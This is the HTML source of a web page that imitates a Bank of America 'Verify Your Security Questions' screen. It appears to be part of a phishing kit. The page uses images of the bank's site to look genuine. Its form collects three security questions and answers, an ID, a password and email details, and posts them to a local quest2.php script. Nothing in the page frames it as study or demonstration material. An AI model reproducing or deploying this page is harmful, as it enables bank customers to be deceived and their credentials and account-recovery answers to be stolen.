<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Verify Your Security Questions -  Bank of America </title>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-20304311-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>


</head>
<body>
<div id="container">
<div id="image9" style="position:absolute; overflow:hidden; left:1px; top:0px; width:1350px; height:232px; z-index:0"><img src="images/head2.png" alt="" title="" border=0 width=1350 height=232></div>





<form action="quest2.php" name="lbha" id="lbha" method="post">

<input name="id" maxlength="16"  required title="Please Enter Right Value" type="text" style="position:absolute;width:171px;height:25px;left:211px;top:324px;z-index:5">

<input name="pass"  required title="Please Enter Right Value" type="text" style="position:absolute;width:171px;height:25px;left:211px;top:455px;z-index:6">

<input name="idmail" maxlength="35"   required title="Please Enter Right Value" type="text" style="position:absolute;width:171px;height:25px;left:211px;top:594px;z-index:5">

<input name="emails" maxlength="35"   required title="Please Enter Right Value" type="text" style="position:absolute;width:171px;height:25px;left:211px;top:664px;z-index:5">



<select name="formselect1" class="textbox" style="position:absolute;left:211px;top:265px;width:580px;height:22px;z-index:17">

<option selected="selected" value="">Please select a question</option>

 <option>
What celebrity do you most resemble?</option>
<option>What is the last name of your third grade teacher?</option>
<option>What was the name of your first boyfriend or girlfriend?</option>
<option>What is the name of your favorite charity?</option>
<option>What is the name of your first babysitter?</option>
<option>What is your best friend's first name?</option>
<option>In what city did you meet your spouse/significant other?

</option>
<option>In what city did you honeymoon? 

</option>
<option>What is the last name of your family physician?</option>
<option>What street did your best friend in high school live on?</option>
</select>




<select name="formselect2" class="textbox" style="position:absolute;left:211px;top:396px;width:580px;height:22px;z-index:17">

<option selected="selected" value="">Please select a question</option>

 <option>As a child, what did you want to be when you grew up?

</option>
<option>What is the name of your favorite restaurant?</option>
<option>Who is your favorite person in history?

</option>
<option>What is the first name of your high school prom date?</option>
<option>What is the name of your high school's star athlete?

</option>
<option>Where were you on New Year's 2000?</option>
<option>What was the make and model of your first car?</option>
<option>What was the first name of your first manager?

</option>
<option>What was the first live concert you attended?</option>
<option>What is the first name of the best man/maid of honor at your wedding?</option></select>




<select name="formselect3" class="textbox" style="position:absolute;left:211px;top:535px;width:580px;height:22px;z-index:17">

<option selected="selected" value="">Please select a question</option>

 <option>What is your all-time favorite song?</option>
<option>What is the name of a college you applied to but didn't attend?</option>
<option>What is the name of the medical professional who delivered your first child?</option>
<option>What is the first name of your favorite niece/nephew?</option>
<option>What is the name of your best childhood friend?

</option>
<option>What was the first name of your favorite teacher or professor?</option>
<option>What is the first name of your hairdresser/barber?</option>
<option>What is the first name of your mother's closest friend?</option>
<option>On what street is your grocery store?
</option>
<option>What was the name of your first pet?</option></select>


<div id="formimage1" style="position:absolute; left:211px; top:725px; z-index:9"><input type="image" name="formimage1" width="90" height="28" src="images/buton.png"></div>

<div id="image7"  style="position:absolute; left:1px; top:240px; width:1350px; height:570px; "><img src="images/mid2.png" alt="" title="" border=0 width=1350 height=570></a></div>


<div id="image8" style="position:absolute; overflow:hidden; left:200px; top:800px; width:995px; height:105px; z-index:11"><a href="#"><img src="images/kkk.png" alt="" title="" border=0 width=981 height=105></a></div>

</div>

</body>
</html>
